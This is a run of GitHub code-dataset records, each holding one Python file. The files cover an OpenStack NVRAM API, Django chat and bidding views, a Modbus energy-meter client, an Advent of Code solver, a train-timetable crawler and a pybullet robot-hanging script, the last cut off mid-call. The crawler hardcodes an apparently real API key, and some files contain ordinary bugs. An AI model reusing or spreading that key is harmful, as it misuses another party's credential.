NVRAM from the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n :returns: the NVRAM data base64 encoded string\n \"\"\"\n\n @abc.abstractmethod\n def delete(self, instance):\n \"\"\"Delete the NVRAM from the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n \"\"\"\n", "repo_name": "openstack/nova-powervm", "sub_path": "nova_powervm/virt/powervm/nvram/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 1615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nova.exception.NovaException", "line_number": 8, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 8, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 9, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 13, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 14, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 18, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 18, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 19, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 23, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 23, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 24, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 30, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 48, "usage_type": "attribute"}, {"api_name": "six.add_metaclass", "line_number": 27, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 27, "usage_type": "attribute"}]}
+{"seq_id": "36013518924", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom .forms import *\nfrom pine.models import *\nfrom pine.forms import *\n# Create your views here.\n@login_required\ndef rooms(request):\n rooms = Room.objects.filter(slug=\"supplier\")\n\n return render(request, 'chat/rooms.html', {'rooms':rooms})\n@login_required\ndef room(request,slug):\n # rooms = Room.objects.all()\n room = Room.objects.get(slug=slug)\n messages = Message.objects.filter(room=room)[0:25]\n\n return render(request, 'chat/room.html', {'room':room, 'messages': messages, })\n\ndef room_delete(request, pk):\n try:\n room = Room.objects.get(id=pk)\n except Room.DoesNotExist:\n return redirect('bidding')\n \n if request.method == 'POST':\n room.delete()\n return redirect('bidding')\n \n return render(request, 'chat/room_delete.html', {'room': room})\n\ndef bidding(request):\n rooms = Room.objects.exclude(slug=\"employee\")\n bidding_processes = BiddingProcess.objects.all()\n if request.method == 'POST':\n roomform = RoomForm(request.POST)\n\n if roomform.is_valid():\n roomform.save()\n return redirect('bidding')\n \n else:\n roomform = RoomForm()\n\n if request.method == 'POST':\n biddingForm = BiddingForm(request.POST)\n\n if biddingForm.is_valid():\n biddingForm.save()\n return redirect('bidding')\n \n else:\n biddingForm = BiddingForm()\n\n\n return render(request, 'chat/bidding.html', {'rooms':rooms, 'roomform': roomform,\n 'bidding_processes': bidding_processes,\n 'biddingForm': biddingForm})\n\ndef bidder_win_list(request):\n bidders_win = BiddingProcess.objects.all()\n for bidding_process in bidders_win:\n bidding_process.total = bidding_process.calculate_total()\n\n context = {\n 'bidders_win': bidders_win\n }\n return render (request, 'chat/bidders_win_list.html', context)", "repo_name": "JayReonal/epine", "sub_path": "chat/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2091, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "16140904602", "text": "\nimport json\nimport logging\nfrom pymodbus.client import ModbusTcpClient\nfrom pymodbus.payload import BinaryPayloadDecoder\nfrom pymodbus.constants import Endian\n#from pymodbus.client.sync import ModbusTcpClient\n\n\nclass Smartfox(object):\n def __init__(self,host, port,logger):\n\n _libName = str(__name__.rsplit('.', 1)[-1])\n self._log = logging.getLogger(logger + '.' + _libName + '.' + self.__class__.__name__)\n\n self._log.debug('Create Smartfox Modbus Object')\n\n self._host = host\n self._port = port\n self._client = None\n\n self._registerFile = \"./data/SmartfoxRegister.json\"\n self._register = None\n\n self._dataType = {\n 'uint16':1,\n 'int16':1,\n 'int32':2,\n 'uint32':2,\n 'STR16':8,\n 'uint64':4,\n 'int64':4\n }\n\n def readConfigFile(self,file=False):\n if file is False:\n file = self._registerFile\n self._log.info('read local file')\n\n with open(file) as _data:\n self._register = json.load(_data)\n\n def connect(self):\n self._client = ModbusTcpClient(self._host, self._port)\n return self._client.connect()\n\n def readRegister(self,slaveId,name):\n # print(type(self._register),self._register)\n _item = self._register.get(name,False)\n if _item is False:\n # print('%s Name not found',name)\n self._log.critical('Value not found %s',name)\n return False\n _address = _item['Start'] -1\n _size = _item['Size']\n _type = _item['Type']\n _scale = _item['Scale Factor']\n if not _scale:\n _scale = 1\n _units = _item['Units']\n\n try:\n _value = self.getData(slaveId,_address,_size)\n _value = self.evaluateData(_value,_type)\n except:\n self._log.error('Problem during evaluation')\n # print(type(_value),_value)\n # print(_value*_scale,_units)\n return (_value*_scale,_units)\n\n\n def getData(self,slaveId,address,size):\n # print(slaveId,address,size)\n received = self._client.read_holding_registers(address=address,\n count= size,\n unit=slaveId)\n # print(received)\n message = BinaryPayloadDecoder.fromRegisters(received.registers, byteorder=Endian.Big, wordorder=Endian.Big)\n return message\n\n def evaluateData(self,message,dataType):\n if dataType == 'int32':\n _data = message.decode_32bit_int()\n elif dataType == 'uint32':\n _data = message.decode_32bit_uint()\n elif dataType == 'uint64':\n _data = message.decode_64bit_uint()\n elif dataType == 'STR16':\n _data = message.decode_string(16).rstrip('\\x00')\n elif dataType == 'STR32':\n _data = message.decode_string(32).rstrip('\\x00')\n elif dataType == 'int16':\n _data = message.decode_16bit_int()\n elif dataType == 'uint16':\n _data = message.decode_16bit_uint()\n else: # if no data type is defined do raw interpretation of the delivered data\n # _data = message.decode_16bit_uint()\n # print('unknown Data Type')\n self._log.error('unkown datattype')\n _data = False\n\n return _data\n\n def queryData(self,data=False):\n _store = {}\n\n if not data:\n self._log.info('read local data')\n data= [\n 'Energy from grid',\n 'Energy into grid',\n 'Energy Smartfox',\n 'Day Energy from grid',\n 'Day Energy into grid',\n 'Day Energy Smartfox',\n 'Power total',\n 'Power L1',\n 'Power L2',\n 'Power L3',\n 'Voltage L1',\n 'Voltage L2',\n 'Voltage L3',\n 'Current L1',\n 'Current L2',\n 'Current L3',\n 'Frequency',\n 'Power Smartfox'\n ]\n\n for _item in data:\n _localStore = {}\n (data,unit) =self.readRegister(1,_item)\n # print(data,unit)\n _localStore['data_value'] = data\n _localStore['data_unit'] = unit\n _store[_item] = _localStore\n\n # print(json.dumps(_store))\n return json.dumps(_store)\n\n\n\n\n \nif __name__ == \"__main__\":\n smart = Smartfox('192.168.2.80')\n smart.readConfigFile()\n\n if smart.connect():\n print('Connected')\n #smart.readRegister(1, 'Energy from grid')\n smart.queryData()\n # smart.readAllRegisters()\n else:\n print('Failed to Connect')", "repo_name": "ms412/Smartfox2mqtt", "sub_path": "library/smartfox.py", "file_name": "smartfox.py", "file_ext": "py", "file_size_in_byte": 4764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pymodbus.client.ModbusTcpClient", "line_number": 44, "usage_type": "call"}, {"api_name": "pymodbus.payload.BinaryPayloadDecoder.fromRegisters", "line_number": 78, "usage_type": "call"}, {"api_name": "pymodbus.payload.BinaryPayloadDecoder", "line_number": 78, "usage_type": "name"}, {"api_name": "pymodbus.constants.Endian.Big", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pymodbus.constants.Endian", "line_number": 78, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 139, "usage_type": "call"}]}
+{"seq_id": "37329714492", "text": "import re\nimport sys\nimport functools\nfrom copy import copy\nfrom itertools import combinations\n\ninput = open(sys.argv[1] if len(sys.argv) >= 2 else 'input').read()\n\nFLOW_RATES = dict()\nNETWORK = dict()\n\nfor line in input.split('\\n'):\n pipe, rate, connections = re.findall(r\"Valve ([A-Z]{2}) has flow rate=([0-9]+); tunnels? leads? to valves? (.*)\", line)[0]\n rate = int(rate)\n NETWORK[pipe] = connections.split(', ')\n FLOW_RATES[pipe] = rate\n\n\ndef distance(s: str, d: str, path = set()) -> int:\n if s == d:\n return 0\n\n paths = []\n for node in [x for x in NETWORK[s] if x not in path]:\n visited = copy(path)\n visited.add(node)\n foo = distance(node, d, visited) \n if foo != None:\n paths.append(1 + foo)\n\n if len(paths) == 0:\n return None \n\n return min(paths)\n \nDISTANCE_TABLE = dict() \nUSEFULL_NODES = [node for (node, rate) in FLOW_RATES.items() if rate > 0]\nUSEFULL_NODES.append('AA')\n\nfor a, b in list(combinations(USEFULL_NODES, 2)):\n DISTANCE_TABLE[(a, b)] = distance(a, b, set(a))\n DISTANCE_TABLE[(b, a)] = distance(b, a, set(b))\n\nUSEFULL_NODES.remove('AA')\n@functools.lru_cache(maxsize=None)\ndef solve(current_node, time_remaining, enabled_nodes = None, players_remaining = 0):\n if enabled_nodes is None: enabled_nodes = frozenset() \n\n if time_remaining == 0:\n if players_remaining > 0:\n return solve('AA', 26 - 1, enabled_nodes, players_remaining - 1)\n else:\n return 0\n\n best = 0\n if current_node not in enabled_nodes and FLOW_RATES[current_node] > 0:\n new_total = time_remaining * FLOW_RATES[current_node]\n best = new_total + solve(current_node, time_remaining-1, enabled_nodes | frozenset([current_node]), players_remaining) \n\n # Look for other options\n for next_node in [node for node in USEFULL_NODES]:\n if next_node in enabled_nodes: continue\n if next_node == current_node: continue\n\n cost = DISTANCE_TABLE[current_node, next_node]\n\n if time_remaining - cost < 0: continue\n best = max(best, solve(next_node, time_remaining-cost, enabled_nodes, players_remaining))\n \n return best\n\nprint(solve('AA', 30 - 1, None, 0))\nprint(solve('AA', 26 - 1, None, 1))", "repo_name": "timfennis/advent-of-code-2022", "sub_path": "python/day16/day16-chain2.py", "file_name": "day16-chain2.py", "file_ext": "py", "file_size_in_byte": 2260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 13, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 25, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 40, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "34986788960", "text": "from urllib import parse, request\nimport json\nfrom ptuBusCrawling.Crawler.Util.SendSlcakMsg import SendSlackMeg\nfrom ptuBusServer.Models import TrainTimeTableModel, TrainStationModel\n\n\nclass TrainTimeTableParsing:\n def __init__(self):\n self.pData = TrainStationModel.objects.all()\n self.apiKey = \"mxl46U1g52x6aVOUX/p969Zbtq9EZmboho4Jp5WiUlQ\"\n self.url = \"https://api.odsay.com/v1/api/trainServiceTime?\"\n self.msg = SendSlackMeg()\n self.trainTypeCode = [\"KTX\", \"무궁화\", \"새마을\", \"ITX-새마을\", \"누리로\", \"통근\"]\n # 0 1 2 3 4 5\n self.dailyTypeCode = [\n \"토\",\n \"금토일\",\n \"토일\",\n \"화수목금토일\",\n \"월화수목토일\",\n \"금\",\n \"금토\",\n \"금일\",\n \"월\",\n \"매일\",\n \"월화수목금토\",\n \"월화수목금\",\n \"월화수목\",\n ]\n # 0 1 2 3 4 5 6 7 8 9 10\n\n def makeURL(self, query):\n return self.url + parse.urlencode(query, encoding=\"UTF-8\", doseq=True)\n\n def openURL(self, query):\n url = self.makeURL(query)\n request_url = request.Request(url)\n response = request.urlopen(request_url)\n return response.read().decode(\"utf-8\")\n\n def checkError(self, data):\n if (\"error\" in data) == True:\n code = data[\"error\"][0][\"code\"]\n message = data[\"error\"][0][\"message\"]\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n else:\n return data\n\n def parsing(self):\n count = 1\n for parsingData in self.pData:\n query = [\n (\"apiKey\", self.apiKey),\n (\"startStationID\", parsingData.startStationID),\n (\"endStationID\", parsingData.endStationID),\n ]\n data = self.openURL(query)\n rDD = self.checkError(json.loads(data))\n startStationName = rDD[\"result\"][\"startStationName\"]\n startStationID = rDD[\"result\"][\"startStationID\"]\n endStationName = rDD[\"result\"][\"endStationName\"]\n endStationID = rDD[\"result\"][\"endStationID\"]\n results = rDD[\"result\"][\"station\"]\n for result in results:\n TrainTimeTableModel(\n id=count,\n startStationName=startStationName,\n startStationID=startStationID,\n endStationName=endStationName,\n endStationID=endStationID,\n railName=result[\"railName\"],\n trainClass=self.trainTypeCode.index(result[\"trainClass\"]),\n departureTime=result[\"departureTime\"],\n schedule=result[\"arrivalTime\"],\n wasteTime=result[\"wasteTime\"],\n dailyTypeCode=self.dailyTypeCode.index(result[\"runDay\"]),\n ).save()\n count += 1\n\n\nif __name__ == \"__main__\":\n if __package__ is None:\n import sys\n from os import path\n\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n from TrainStationParsing import TrainStationParsing\n else:\n from .TrainStationParsing import TrainStationParsing\n sample = TrainTimeTableParsing(TrainStationParsing().parsing()).parsing()\n", "repo_name": "ptuBus/ptuBus_Server", "sub_path": "ptuBusCrawling/Crawler/Trains/TrainTimeTableParsing.py", "file_name": "TrainTimeTableParsing.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ptuBusServer.Models.TrainStationModel.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.TrainStationModel.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "ptuBusServer.Models.TrainStationModel", "line_number": 9, "usage_type": "name"}, {"api_name": "ptuBusCrawling.Crawler.Util.SendSlcakMsg.SendSlackMeg", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.Request", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 38, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.TrainTimeTableModel", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 89, "usage_type": "call"}, {"api_name": "TrainStationParsing.TrainStationParsing", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "72606297367", "text": "import os, inspect\nimport argparse\nimport json\nimport time\nimport quaternion\nimport scipy.io as sio\nimport numpy as np\nfrom scipy.spatial.transform import Rotation as R\nfrom PIL import Image\nimport pybullet as p\nimport pybullet_data\n\n# for robot control\nfrom pybullet_robot_envs.envs.panda_envs.panda_env import pandaEnv\n\nfrom utils.bullet_utils import get_matrix_from_pose, get_pose_from_matrix, get_matrix_from_pos_rot, get_pos_rot_from_matrix, xyzw2wxyz, wxyz2xyzw, draw_coordinate, draw_bbox\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0, parentdir)\n\ndef recover_trajectory(traj_src : np.ndarray, hook_poses : np.ndarray, \n centers : np.ndarray, scales, dataset_mode : int=0):\n # traj : dim = batch x num_steps x 6\n # dataset_mode : 0 for abosute, 1 for residual \n\n traj = None\n traj = np.copy(traj_src)\n\n waypoints = []\n\n if dataset_mode == 0: # \"absolute\"\n\n traj[:, :3] = traj[:, :3] * scales + centers\n \n hook_trans = get_matrix_from_pose(hook_poses)\n for wpt_id in range(0, traj.shape[0]): # waypoints\n\n wpt = np.zeros(6)\n # contact pose rotation\n wpt[:3] = traj[wpt_id]\n\n # transform to world coordinate first\n current_trans = np.identity(4)\n current_trans[:3, 3] = traj[wpt_id]\n current_trans = hook_trans @ current_trans\n\n if wpt_id < traj.shape[0] - 1:\n # transform to world coordinate first\n\n peep_num_max = int(np.ceil(traj.shape[0] / 10.0))\n peep_num = peep_num_max if wpt_id < traj.shape[0] - peep_num_max else traj.shape[0] - wpt_id - 1\n to_pos = np.ones((4, peep_num))\n to_pos[:3] = traj[wpt_id:wpt_id+peep_num].T \n to_pos = (hook_trans @ to_pos)[:3]\n \n from_pos = np.ones((4, peep_num))\n from_pos[:3] = traj[wpt_id+1:wpt_id+peep_num+1].T \n from_pos = (hook_trans @ from_pos)[:3]\n\n weight = np.array([1/x for x in range(3, peep_num+3)])[:peep_num]\n weight /= np.sum(weight)\n diff = (to_pos - from_pos) * weight\n \n x_direction = np.sum(diff, axis=1)\n x_direction /= np.linalg.norm(x_direction, ord=2)\n y_direction = np.cross(x_direction, [0, 0, -1])\n y_direction /= np.linalg.norm(y_direction, ord=2)\n z_direction = np.cross(x_direction, y_direction)\n rotation_mat = np.vstack((x_direction, y_direction, z_direction)).T\n current_trans[:3, :3] = rotation_mat\n \n else :\n\n current_trans[:3, :3] = R.from_rotvec(waypoints[-1][3:]).as_matrix() # use the last waypoint's rotation as current rotation\n \n waypoints.append(get_pose_from_matrix(current_trans, pose_size=6))\n \n return waypoints\n\n\ndef robot_apply_action(robot : pandaEnv, obj_id : int, action : tuple or list, gripper_action : str = 'nop', \n sim_timestep : float = 1.0 / 240.0, diff_thresh : float = 0.005, max_vel : float = 0.2, max_iter = 5000):\n\n assert gripper_action in ['nop', 'pre_grasp', 'grasp']\n\n if gripper_action == 'nop':\n assert len(action) == 7, 'action length should be 7'\n\n robot.apply_action(action, max_vel=max_vel)\n diff = 10.0\n iter = 0\n while diff > diff_thresh and iter < max_iter: \n iter += 1\n\n p.stepSimulation()\n time.sleep(sim_timestep)\n\n tmp_pos = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[4] # position\n tmp_rot = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[5] # rotation\n diff = np.sum((np.array(tmp_pos + tmp_rot) - np.array(action)) ** 2) ** 0.5\n\n elif gripper_action == 'pre_grasp' :\n\n robot.pre_grasp()\n for _ in range(int(1.0 / sim_timestep) * 1): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n else:\n\n robot.grasp(obj_id)\n for _ in range(int(1.0 / sim_timestep)): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n\ndef get_dense_waypoints(start_config : list or tuple or np.ndarray, end_config : list or tuple or np.ndarray, resolution : float=0.005):\n\n assert len(start_config) == 7 and len(end_config) == 7\n\n d12 = np.asarray(end_config[:3]) - np.asarray(start_config[:3])\n steps = int(np.ceil(np.linalg.norm(np.divide(d12, resolution), ord=2)))\n obj_init_quat = quaternion.as_quat_array(xyzw2wxyz(start_config[3:]))\n obj_tgt_quat = quaternion.as_quat_array(xyzw2wxyz(end_config[3:]))\n\n ret = []\n # plan trajectory in the same way in collision detection module\n for step in range(steps):\n ratio = (step + 1) / steps\n pos = ratio * d12 + np.asarray(start_config[:3])\n quat = quaternion.slerp_evaluate(obj_init_quat, obj_tgt_quat, ratio)\n quat = wxyz2xyzw(quaternion.as_float_array(quat))\n position7d = tuple(pos) + tuple(quat)\n ret.append(position7d)\n\n return ret\n\ndef refine_rotation(src_transform, tgt_transform):\n src_rot = src_transform[:3, :3]\n tgt_rot = tgt_transform[:3, :3]\n\n s2d_before = R.from_matrix(tgt_rot @ np.linalg.inv(src_rot)).as_rotvec()\n\n rot_180 = np.identity(4)\n rot_180[:3, :3] = R.from_rotvec([0, 0, np.pi]).as_matrix()\n tgt_dual_transform = tgt_transform @ rot_180\n s2d_after = R.from_matrix(tgt_dual_transform[:3, :3] @ np.linalg.inv(src_rot)).as_rotvec()\n\n return tgt_transform if np.sum((s2d_before) ** 2) < np.sum((s2d_after) ** 2) else tgt_dual_transform\n\ndef main(args):\n\n time_stamp = time.localtime()\n time_mon_day = '{:02d}{:02d}'.format(time_stamp.tm_mon, time_stamp.tm_mday)\n\n data_dir = f'{args.data_root}/{args.data_dir}'\n kpt_trajectory_dir = f'{args.input_root}/{args.input_dir}' if args.input_dir != '' else f'{args.input_root}/{time_mon_day}'\n\n assert os.path.exists(data_dir), f'{data_dir} not exists'\n assert os.path.exists(kpt_trajectory_dir), f'{kpt_trajectory_dir} not exists'\n assert os.path.exists(args.output_root), f'{args.output_root} not exists'\n \n # load model\n obj_fname = f'{kpt_trajectory_dir}/{args.obj}'\n hook_fname = f'{kpt_trajectory_dir}/{args.hook}'\n obj_name = os.path.split(obj_fname)[1].split('.')[0]\n hook_name = os.path.split(hook_fname)[1].split('.')[0]\n obj_hook_pair_fname = f'{data_dir}/Hook_my_bar_easy-everyday_objects_50/Hook_my_bar_easy-{obj_name}.json'\n\n assert os.path.exists(obj_hook_pair_fname), f'{obj_hook_pair_fname} not exists'\n assert os.path.exists(obj_fname), f'{obj_fname} not exists'\n assert os.path.exists(hook_fname), f'{hook_fname} not exists'\n\n with open(obj_hook_pair_fname, 'r') as f:\n obj_hook_pair_dict = json.load(f)\n with open(obj_fname, 'r') as f:\n obj_dict = json.load(f)\n with open(hook_fname, 'r') as f:\n hook_dict = json.load(f)\n \n # demonstration_dir = f'{args.output_root}/{args.output_dir}' if args.output_dir != '' else f'{args.output_root}/{time_mon_day}'\n # if not os.path.exists(demonstration_dir):\n # os.mkdir(demonstration_dir)\n\n # assert some attributes exist in the given json files\n assert 'initial_pose' in obj_hook_pair_dict.keys(), \\\n f'\"initial_pose\" not in obj_hook_pair_dict!, please run hanging_init_pose.py'\n assert 'contact_pose' in obj_dict.keys() and 'file' in obj_dict.keys(), \\\n f'\"contact_pose\" or \"file\" not in obj_dict!, please run keypoint_pose.py'\n assert 'hook_pose' in hook_dict.keys() and 'file' in hook_dict.keys() and 'trajectory' in hook_dict.keys(), \\\n f'\"hook_pose\" or \"file\" or \"trajectory\" not in hook_dict!, please run keypoint_trajectory.py'\n \n # ------------------------ #\n # --- Setup simulation --- #\n # ------------------------ #\n\n # Create pybullet GUI\n physics_client_id = p.connect(p.DIRECT)\n # physics_client_id = p.connect(p.GUI)\n # p.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\n p.resetDebugVisualizerCamera(\n cameraDistance=0.2,\n cameraYaw=90,\n cameraPitch=-30,\n cameraTargetPosition=[0.5, 0.0, 1.3]\n )\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n sim_timestep = 1.0 / 240\n p.setTimeStep(sim_timestep)\n p.setGravity(0, 0, -9.8)\n\n # ------------------- #\n # --- Setup robot --- #\n # ------------------- #\n\n # Load plane contained in pybullet_data\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"))\n robot = pandaEnv(physics_client_id, use_IK=1)\n\n # -------------------------- #\n # --- Load other objects --- #\n # -------------------------- #\n\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"table/table.urdf\"), [1, 0.0, 0.0])\n\n obj_contact_pose_6d = obj_dict['contact_pose']\n obj_contact_relative_transform = get_matrix_from_pos_rot(obj_contact_pose_6d[:3], obj_contact_pose_6d[3:])\n obj_id = p.loadURDF(obj_dict['file'])\n # p.resetBasePositionAndOrientation(obj_id, obj_pos, obj_rot)\n\n hook_pose_6d = hook_dict['hook_pose']\n hook_pos = hook_pose_6d[:3]\n hook_quat = hook_pose_6d[3:]\n hook_id = p.loadURDF(hook_dict['file'], hook_pos, hook_quat)\n hook_transform = get_matrix_from_pos_rot(hook_pos, hook_quat)\n\n wpt_num = args.wpt_num\n wpt_dim = args.wpt_dim\n preload_path = f'kptraj_{wpt_num}/val/{hook_name}/traj-{args.traj_id}.json'\n assert os.path.exists(preload_path), f'{preload_path} not exists'\n preload_traj_dict = json.load(open(preload_path, 'r')) \n trajectories_hook = [preload_traj_dict['trajectory'][::-1]]\n # trajectories_hook = hook_dict['trajectory'][2:3]\n\n # grasping\n index = 0 # medium\n initial_info = obj_hook_pair_dict['initial_pose'][index] # medium\n obj_pos = initial_info['obj_pose'][:3]\n obj_rot = initial_info['obj_pose'][3:]\n # obj_pos = list(np.array(obj_pos) + np.array([0, 0, 0.02]))\n\n initial_info = obj_hook_pair_dict['initial_pose'][index] # medium\n robot_pos = initial_info['robot_pose'][:3]\n robot_rot = initial_info['robot_pose'][3:]\n # robot_pos = list(np.array(robot_pos) + np.array([0, 0, 0.02]))\n robot_pose = robot_pos + robot_rot\n robot_transform = get_matrix_from_pos_rot(robot_pos, robot_rot)\n\n for traj_i in range(len(trajectories_hook)):\n \n robot.reset()\n\n robot.apply_action(robot_pose, max_vel=-1)\n for _ in range(int(1.0 / sim_timestep * 0.5)): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n robot.grasp(obj_id=obj_id)\n for _ in range(int(1.0 / sim_timestep * 0.25)): \n p.resetBasePositionAndOrientation(obj_id, obj_pos, obj_rot)\n p.stepSimulation()\n time.sleep(sim_timestep)\n time.sleep(1)\n\n obj_transform = get_matrix_from_pos_rot(obj_pos, obj_rot)\n kpt_transform_world = obj_transform @ obj_contact_relative_transform\n \n trajectory_hook = trajectories_hook[traj_i]\n\n if wpt_dim == 3:\n trajectory_hook_3d = np.asarray(trajectory_hook)[:, :3]\n trajectory_hook_world = recover_trajectory(trajectory_hook_3d, hook_pose_6d, np.array([0, 0, 0]), 1)\n\n trajectory_hook = []\n for wpt_world in trajectory_hook_world:\n wpt_trans = np.linalg.inv(get_matrix_from_pose(hook_pose_6d)) @ get_matrix_from_pose(wpt_world)\n trajectory_hook.append(list(get_pose_from_matrix(wpt_trans)))\n\n # first_waypoint = trajectory_hook[-100:][0]\n first_waypoint = trajectory_hook[0]\n relative_kpt_transform = get_matrix_from_pos_rot(first_waypoint[:3], first_waypoint[3:])\n first_kpt_transform_world = hook_transform @ relative_kpt_transform\n\n kpt_transform_world = refine_rotation(first_kpt_transform_world, kpt_transform_world)\n\n kpt_to_gripper = np.linalg.inv(kpt_transform_world) @ robot_transform\n first_gripper_transform = first_kpt_transform_world @ kpt_to_gripper\n\n first_gripper_pos, first_gripper_rot = get_pos_rot_from_matrix(first_gripper_transform)\n first_gripper_pose = list(first_gripper_pos) + list(first_gripper_rot)\n\n # draw_coordinate(first_kpt_transform_world, size=0.01)\n\n trajectory_start = get_dense_waypoints(robot_pose, first_gripper_pose, resolution=0.002)\n for waypoint in trajectory_start:\n robot.apply_action(waypoint)\n p.stepSimulation()\n robot.grasp()\n for _ in range(10): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n \n old_gripper_pose = first_gripper_pose\n # trajectory_hook = trajectory_hook[-100:-20] if 'hard' in hook_name or 'devil' in hook_name else trajectory_hook[-100:-5]\n \n ignore_wpt_num = int(np.ceil(len(trajectory_hook[0]) * 0.1)) if wpt_dim == 3 else 0\n for i, waypoint in enumerate(trajectory_hook):\n\n if i + ignore_wpt_num >= len(trajectory_hook):\n break\n\n waypoint_abs = get_pose_from_matrix(hook_transform @ get_matrix_from_pose(waypoint))\n\n gripper_transform = get_matrix_from_pose(waypoint_abs) @ kpt_to_gripper\n gripper_pose = get_pose_from_matrix(gripper_transform)\n\n fine_gripper_poses = get_dense_waypoints(old_gripper_pose, gripper_pose, resolution=0.002)\n for fine_gripper_pose in fine_gripper_poses:\n robot.apply_action(fine_gripper_pose)\n p.stepSimulation()\n \n robot.grasp()\n for _ in range(5): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n old_gripper_pose = gripper_pose\n\n # execution step 2 : release gripper\n robot_apply_action(robot, obj_id, gripper_pose, gripper_action='pre_grasp', \n sim_timestep=0.05, diff_thresh=0.01, max_vel=-1, max_iter=100)\n\n # execution step 3 : go to the ending pose\n gripper_rot = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[5]\n gripper_rot_matrix = R.from_quat(gripper_rot).as_matrix()\n ending_gripper_pos = np.asarray(gripper_pose[:3]) + (gripper_rot_matrix @ np.array([[0], [0], [-0.05]])).reshape(3)\n action = tuple(ending_gripper_pos) + tuple(gripper_rot)\n robot_apply_action(robot, obj_id, action, gripper_action='nop', \n 